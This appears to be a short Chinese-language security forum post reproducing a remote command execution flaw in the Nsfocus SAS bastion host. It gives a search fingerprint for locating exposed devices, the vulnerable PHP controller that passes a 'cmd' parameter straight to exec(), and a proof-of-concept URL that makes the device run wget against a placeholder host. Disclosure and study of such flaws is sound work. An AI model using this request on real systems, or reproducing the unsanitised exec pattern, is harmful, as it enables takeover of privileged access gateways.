Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

# Nsfocus SAS堡垒机 Exec 远程命令执行漏洞 ## 漏洞描述 Nsfocus SAS堡垒机 Exec 远程命令执行漏洞 ## 漏洞影响 Nsfocus SAS堡垒机 ## 网络测绘 body="'/needUsbkey.ph...

Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

漏洞描述

Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

漏洞影响

Nsfocus SAS堡垒机

网络测绘

body="'/needUsbkey.php?username='"

漏洞复现

登陆页面

img

漏洞存在于文件 ExecController.php 文件中

img

<?php
  require_once 'Nsc/Websvc/Response.php';
class ExecController extends Cavy_Controller_Action {

  var $models = 'no';

  public function index() {
    $command = $this->_params['cmd'];
    $ret = 0;
    $output = array();
    exec($command,$output,$ret);
    $result = new StdClass;
    if ($ret != 0) {
      $result->code = Nsc_Websvc_Response::EXEC_ERROR;
      $result->text = "exec error";
    }
    else {
      $result->code = Nsc_Websvc_Response::SUCCESS;
      //            $result->text = implode("\n",$output);
      $result->text = "WEBSVC OK";
    }
    $this->_render(array('result'=>$result),'/websvc/result');
  }
}
?>

验证POC

/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx

img

img

  • 发表于 2024-07-12 18:46:31
  • 阅读 ( 1977 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计